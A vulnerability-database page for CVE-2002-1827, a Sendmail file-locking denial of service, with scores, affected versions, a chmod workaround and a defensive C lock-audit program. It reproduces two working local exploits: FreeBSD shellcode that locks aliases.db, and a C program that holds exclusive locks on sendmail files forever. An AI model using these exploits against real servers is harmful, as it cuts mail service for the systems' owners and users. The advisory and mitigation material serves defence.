CVE-2002-1827
CVSS 2.1
Published: 2002-12-31 00:00:00
Revised: 2008-09-05 16:31:37
NMCOE

[Original] Sendmail 8.9.0 through 8.12.3 allows local users to cause a denial of service by obtaining an exclusive lock on the (1) alias, (2) map, (3) statistics, and (4) pid files.


[CNNVD] Sendmail File Locking Mechanism Denial of Service Vulnerability (CNNVD-200212-826)

        Sendmail is a popular free, open-source mail transfer agent that runs on many Unix and Linux operating systems.
        Sendmail contains a flaw in how it handles file locking that lets a local attacker mount a denial-of-service attack.
        flock() can lock a file that has been opened only for reading. fcntl() locks a file that has been opened for writing, which offers better protection. Once one process holds a lock on a file, other processes cannot operate on it. Normally a program locks a file with one of these two functions for the duration of an operation and releases it when done; if an attacker builds a malicious program that locks the files Sendmail depends on and never releases them, sendmail or the programs that work with those files stop operating normally.

- CVSS (base score)

CVSS score: 2.1 [Low]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:sendmail:sendmail:8.11.2        Sendmail Sendmail 8.11.2
cpe:/a:sendmail:sendmail:8.11.6        Sendmail Sendmail 8.11.6
cpe:/a:sendmail:sendmail:8.9.2         Sendmail Sendmail 8.9.2
cpe:/a:sendmail:sendmail:8.10.1        Sendmail Sendmail 8.10.1
cpe:/a:sendmail:sendmail:8.11.1        Sendmail Sendmail 8.11.1
cpe:/a:sendmail:sendmail:8.12:beta12   Sendmail Sendmail 8.12 Beta12
cpe:/a:sendmail:sendmail:8.12:beta16   Sendmail Sendmail 8.12 Beta16
cpe:/a:sendmail:sendmail:8.9.3         Sendmail Sendmail 8.9.3
cpe:/a:sendmail:sendmail:8.12:beta5    Sendmail Sendmail 8.12 Beta5
cpe:/a:sendmail:sendmail:8.11.3        Sendmail Sendmail 8.11.3
cpe:/a:sendmail:sendmail:8.12.1        Sendmail Sendmail 8.12.1
cpe:/a:sendmail:sendmail:8.9.1         Sendmail Sendmail 8.9.1
cpe:/a:sendmail:sendmail:8.12:beta7    Sendmail Sendmail 8.12 Beta7
cpe:/a:sendmail:sendmail:8.12.0        Sendmail Sendmail 8.12.0
cpe:/a:sendmail:sendmail:8.12:beta10   Sendmail Sendmail 8.12 Beta10
cpe:/a:sendmail:sendmail:8.12.3        Sendmail Sendmail 8.12.3
cpe:/a:sendmail:sendmail:8.12.2        Sendmail Sendmail 8.12.2
cpe:/a:sendmail:sendmail:8.9.0         Sendmail Sendmail 8.9.0
cpe:/a:sendmail:sendmail:8.11.5        Sendmail Sendmail 8.11.5
cpe:/a:sendmail:sendmail:8.11.0        Sendmail Sendmail 8.11
cpe:/a:sendmail:sendmail:8.10          Sendmail Sendmail 8.10
cpe:/a:sendmail:sendmail:8.10.2        Sendmail Sendmail 8.10.2
cpe:/a:sendmail:sendmail:8.11.4        Sendmail Sendmail 8.11.4

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1827
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1827
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-826
(official data source) CNNVD

- Other links and resources

http://www.sendmail.org/LockingAdvisory.txt
(VENDOR_ADVISORY)  CONFIRM  http://www.sendmail.org/LockingAdvisory.txt
http://www.securityfocus.com/bid/4822
(UNKNOWN)  BID  4822
http://www.iss.net/security_center/static/9162.php
(UNKNOWN)  XF  sendmail-file-locking-dos(9162)

- Vulnerability information

Sendmail File Locking Mechanism Denial of Service Vulnerability
Low severity  Other
2002-12-31 00:00:00 2005-10-20 00:00:00
Local

- Advisory and patches

        Temporary workaround:
        If you cannot install a patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * Change the permissions of the sendmail-related files so that unauthorized users cannot open them at all (flock() needs only read access to take a lock):
         chmod 0640 /etc/mail/aliases /etc/mail/aliases.{db,pag,dir}
         chmod 0640 /etc/mail/*.{db,pag,dir}
         chmod 0640 /etc/mail/statistics /var/log/sendmail.st
         chmod 0600 /var/run/sendmail.pid /etc/mail/sendmail.pid
        Vendor patch:
        Sendmail Consortium
        -------------------
        The Sendmail developers will fix this issue in version 8.12.4:

        http://www.sendmail.org
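The locking explanation in the CNNVD description and the chmod workaround above both come down to one check an administrator can run: are the alias, map, statistics and pid files readable only by the users who need them, and is anyone currently holding one of them locked? The following C program is an added example written for this page; it is not part of the CNNVD record, the Sendmail advisory, or Sendmail's own code. audit_file() compares a file's permission bits against a maximum mode and then probes with a non-blocking shared flock(), which conflicts only with an exclusive lock, so EWOULDBLOCK means some other open file description holds the file exclusively. demo() exercises it on a constructed temporary file rather than a real sendmail file; the function names, result codes and the /tmp path are this example's own assumptions.

```c
#define _DEFAULT_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/file.h>
#include <sys/stat.h>
#include <unistd.h>

/* Result bits returned by audit_file() (names chosen for this example). */
#define AUDIT_OK         0
#define AUDIT_PERM_LOOSE 1   /* mode grants bits beyond max_mode */
#define AUDIT_LOCK_HELD  2   /* another open file description holds an exclusive flock() */
#define AUDIT_ERROR      4   /* stat/open/flock failed for another reason */

/*
 * Check that the permission bits of `path` are no looser than `max_mode`
 * (e.g. 0640 for the alias and map files, 0600 for the pid file), then
 * probe with a non-blocking shared flock().  A shared lock conflicts only
 * with an exclusive one, so EWOULDBLOCK here means some other descriptor
 * currently holds the file exclusively, which is what a lock-based DoS
 * against sendmail looks like from the outside.
 */
int audit_file(const char *path, mode_t max_mode)
{
    struct stat st;
    int result = AUDIT_OK;

    if (stat(path, &st) != 0)
        return AUDIT_ERROR;
    if ((st.st_mode & 07777) & ~max_mode)
        result |= AUDIT_PERM_LOOSE;

    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return result | AUDIT_ERROR;

    if (flock(fd, LOCK_SH | LOCK_NB) == 0) {
        flock(fd, LOCK_UN);            /* probe only: release immediately */
    } else if (errno == EWOULDBLOCK) {
        result |= AUDIT_LOCK_HELD;
    } else {
        result |= AUDIT_ERROR;
    }
    close(fd);
    return result;
}

/*
 * Exercise audit_file() on a constructed temporary file (not a real
 * sendmail file).  Fills out[0..2] with the results of three audits:
 * world-readable file, correctly restricted file, file with an exclusive
 * lock held by another descriptor.  Returns 0 on success, -1 on setup error.
 */
int demo(int out[3])
{
    char path[] = "/tmp/lockaudit-XXXXXX";   /* constructed sample path */
    int fd = mkstemp(path);
    if (fd < 0)
        return -1;

    fchmod(fd, 0644);                 /* too loose for a 0640 policy */
    out[0] = audit_file(path, 0640);  /* AUDIT_PERM_LOOSE */

    fchmod(fd, 0640);
    out[1] = audit_file(path, 0640);  /* AUDIT_OK */

    /* Hold an exclusive lock on this descriptor; the audit opens the file
     * again, so its probe sees the conflict just as sendmail would. */
    flock(fd, LOCK_EX);
    out[2] = audit_file(path, 0640);  /* AUDIT_LOCK_HELD */

    flock(fd, LOCK_UN);
    close(fd);
    unlink(path);
    return 0;
}

int main(void)
{
    int r[3];
    if (demo(r) != 0) {
        perror("demo");
        return 1;
    }
    for (int i = 0; i < 3; i++)
        printf("audit %d -> %d (%s)\n", i, r[i],
               r[i] == AUDIT_OK ? "ok" :
               (r[i] & AUDIT_LOCK_HELD) ? "lock-held" : "perm-loose");
    return 0;
}
```

To use it against the real files from the workaround, call audit_file() with the same modes the chmod lines set (0640 for the alias, map and statistics files, 0600 for the pid file) from a periodic job and alert on any non-zero result; the shared, non-blocking probe never waits and never interferes with sendmail's own locking.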

- Vulnerability information (21476)

Sendmail 8.9.x/8.10.x/8.11.x/8.12.x File Locking Denial Of Service Vulnerability (1) (EDBID:21476)
linux dos
2002-05-24 Verified
0 zillion
N/A
source: http://www.securityfocus.com/bid/4822/info

Sendmail is a MTA for Unix and Linux variants.

There is a vulnerability in Sendmail that will lead to a denial of service condition. The vulnerability occurs when a malicious user acquires an exclusive lock on files that Sendmail requires for operation. 

/*

FreeBSD Sendmail DoS shellcode that locks /etc/mail/aliases.db
Written by zillion (at http://www.safemode.org && http://www.snosoft.com)

More info: http://www.sendmail.org/LockingAdvisory.txt

*/

char shellcode[] =
        "\xeb\x1a\x5e\x31\xc0\x88\x46\x14\x50\x56\xb0\x05\x50\xcd\x80"
        "\x6a\x02\x50\xb0\x83\x50\xcd\x80\x80\xe9\x03\x78\xfe\xe8\xe1"
        "\xff\xff\xff\x2f\x65\x74\x63\x2f\x6d\x61\x69\x6c\x2f\x61\x6c"
        "\x69\x61\x73\x65\x73\x2e\x64\x62";

/* Classic shellcode test harness for 32-bit x86: overwrite main's saved
 * return address on the stack with the address of the shellcode so it runs
 * when main returns. Assumes a 32-bit, non-PIE, executable-stack build. */
int main()
{

  int *ret;
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
  return 0;
}

- Vulnerability information (21477)

Sendmail 8.9.x/8.10.x/8.11.x/8.12.x File Locking Denial Of Service Vulnerability (2) (EDBID:21477)
linux dos
2002-05-24 Verified
0 zillion
N/A
source: http://www.securityfocus.com/bid/4822/info
 
Sendmail is a MTA for Unix and Linux variants.
 
There is a vulnerability in Sendmail that will lead to a denial of service condition. The vulnerability occurs when a malicious user acquires an exclusive lock on files that Sendmail requires for operation. 

#include <fcntl.h>
#include <stdio.h>
#include <sys/file.h>   /* flock(), LOCK_EX */
#include <unistd.h>

/*

Stupid piece of code to test the sendmail lock vulnerability on
FreeBSD. Run this and try sendmail -t on FreeBSD for example.

More info: http://www.sendmail.org/LockingAdvisory.txt

zillion (at safemode.org && snosoft.com)
http://www.safemode.org
http://www.snosoft.com

*/

int main() {

  if(fork() == 0) {

    /* The files are opened read-only: flock() does not require write
     * access to take an exclusive lock, which is the whole problem. */
    char *lock1 = "/etc/mail/aliases";
    char *lock2 = "/etc/mail/aliases.db";
    char *lock3 = "/var/log/sendmail.st";

    int fd;
    fd = open(lock1,O_RDONLY);
    if(fd < 0) perror(lock1);
    else flock(fd,LOCK_EX);   /* LOCK_EX is the 0x02 used in the original */

    fd = open(lock2,O_RDONLY);
    if(fd < 0) perror(lock2);
    else flock(fd,LOCK_EX);

    fd = open(lock3,O_RDONLY);
    if(fd < 0) perror(lock3);
    else flock(fd,LOCK_EX);

    /* We are here to stay! The child never exits, so the descriptors
     * (and their locks) are never released. */

    for(;;) {}

  }
  return 0;
}

- Vulnerability information

59769
Sendmail Multiple Configuration File Lock Local DoS
Local Access Required Denial of Service
Loss of Availability
Exploit Public Vendor Verified

- Vulnerability description

Unknown or Incomplete

- Timeline

2002-05-24 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete